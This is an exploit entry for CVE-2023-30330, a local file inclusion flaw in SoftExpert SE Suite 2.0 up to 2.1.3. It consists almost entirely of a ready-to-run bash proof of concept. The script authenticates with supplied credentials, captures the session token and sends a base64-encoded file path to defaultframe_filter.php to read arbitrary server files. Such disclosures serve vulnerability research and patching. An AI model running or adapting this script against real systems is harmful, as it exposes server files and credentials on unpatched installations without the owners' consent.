SoftExpert (SE) Suite v2.1.3 - Local File Inclusion

# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115

# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330


#!/bin/bash

# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> 

target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)

end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"

echo -e "\n$4 : $file\n"

echo -e "${blue}\nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST' \
    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)

echo "cookie: $cookie"

function LFI () {

curl -s -k -X $'POST' \
    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"

}

echo -e "${blue}\nExploiting LFI:${end}"
LFI

function logout () {
curl -i -s -k -X $'POST' \
    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
    "https://$target/softexpert/selogout"
}

echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"